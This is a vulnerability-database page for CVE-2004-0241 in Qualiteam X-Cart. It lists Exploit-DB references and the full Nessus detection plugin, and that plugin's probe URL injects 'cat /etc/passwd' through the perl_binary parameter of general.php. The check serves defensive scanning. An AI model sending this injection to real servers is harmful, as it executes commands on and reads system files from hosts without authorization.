Vulnerabilities > CVE-2004-0241 - Remote Command Execution vulnerability in Qualiteam X-Cart

CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE

Summary

X-Cart 3.4.3 allows remote attackers to execute arbitrary commands via the perl_binary argument in (1) upgrade.php or (2) general.php.

Exploit-Db

  • description: Qualiteam X-Cart 3.x upgrade.php perl_binary Parameter Arbitrary Command Execution. CVE-2004-0241. Webapps exploit for php platform
    id: EDB-ID:23637
    last seen: 2016-02-02
    modified: 2004-02-03
    published: 2004-02-03
    reporter: Philip
    source: https://www.exploit-db.com/download/23637/
    title: Qualiteam X-Cart 3.x upgrade.php perl_binary Parameter Arbitrary Command Execution
  • description: Qualiteam X-Cart 3.x general.php perl_binary Parameter Arbitrary Command Execution. CVE-2004-0241. Webapps exploit for php platform
    id: EDB-ID:23636
    last seen: 2016-02-02
    modified: 2004-02-03
    published: 2004-02-03
    reporter: Philip
    source: https://www.exploit-db.com/download/23636/
    title: Qualiteam X-Cart 3.x general.php perl_binary Parameter Arbitrary Command Execution

Nessus

NASL family: CGI abuses
NASL id: QUALITEAM_XCART_CMD_EXEC.NASL
description: The remote host is running Qualiteam X-Cart, shopping cart software written in PHP. There is a bug in this software that could allow an attacker to execute arbitrary commands on the remote web server with the privileges of the web user. In addition, there are some flaws that could allow an attacker to obtain more information about the remote server, such as the physical location of the remote web root.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 12040
published: 2004-02-03
reporter: This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/12040
title: Qualiteam X-Cart Multiple Script perl_binary Parameter Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

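if(description)
{
 # Plugin registration: identifiers, metadata and scheduling hints for the
 # Nessus engine. No network activity happens in this branch.
 script_id(12040);
 script_version ("1.21");
 script_cve_id("CVE-2004-0241");
 script_bugtraq_id(9560);
 
 script_name(english:"Qualiteam X-Cart Multiple Script perl_binary Parameter Arbitrary Command Execution");
 
 script_set_attribute(attribute:"synopsis", value:
"Arbitrary commands can be run on the remote server." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Qualiteam X-Cart - a shopping cart software 
written in PHP.

There is a bug in this software that could allow an attacker to execute
arbitrary commands on the remote web server with the privileges of the
web user.  In addition to this, there are some flaws that could allow
an attacker to obtain more information about the remote server, like
the physical location of the remote web root." );
 # The previous solution text named "blog.cgi", which is unrelated to this
 # plugin (a copy-paste remnant); the affected product is X-Cart itself.
 script_set_attribute(attribute:"solution", value:
"Upgrade to the latest version of X-Cart or disable this software." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 # NOTE(review): public Exploit-DB entries (EDB-ID 23636 and 23637) exist for
 # CVE-2004-0241, so "exploit_available" = "false" looks stale; confirm
 # against current plugin policy before changing, as it feeds report metadata.
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2004/02/03");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/02/03");
 script_cvs_date("Date: 2018/07/26 13:32:42");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 script_summary(english:"Checks Qualiteam X-Cart");
 # NOTE(review): the detection path below executes a command on the target
 # host, which is more intrusive than ACT_GATHER_INFO implies; ACT_ATTACK may
 # be the more accurate category. Left unchanged because the category decides
 # when the scanner schedules the plugin.
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 # webmirror.nasl populates cgi_dirs(); http_version.nasl sets www/PHP.
 script_dependencie("webmirror.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_keys("www/PHP");
 exit(0);
}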

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

# X-Cart is a PHP application; skip servers that cannot run PHP at all.
if (!can_host_php(port:port)) exit(0);

foreach dir (cgi_dirs())
{
  # Probe the admin script with an injected perl_binary value. A vulnerable
  # install runs the injected command and returns the passwd file in the
  # response, which is what the pattern match below looks for.
  url = string(dir, "/admin/general.php?mode=perlinfo&config[General][perl_binary]=cat%20/etc/passwd||");
  res = http_send_recv3(method:"GET", item:url, port:port);

  # No answer at all means the web server is not responding; stop the check.
  if (isnull(res)) exit(0);

  # Status line, headers and body are searched together for a root entry.
  page = res[0] + res[1] + res[2];
  if (!egrep(pattern:".*root:.*:0:[01]:.*", string:page)) continue;

  if (report_verbosity > 0)
  {
    report = strcat('\nThe following URL exhibits the flaw :\n\n', build_url(port:port, qs:url), '\n');
    security_hole(port, extra:report);
  }
  else
  {
    security_hole(port);
  }
  exit(0);
}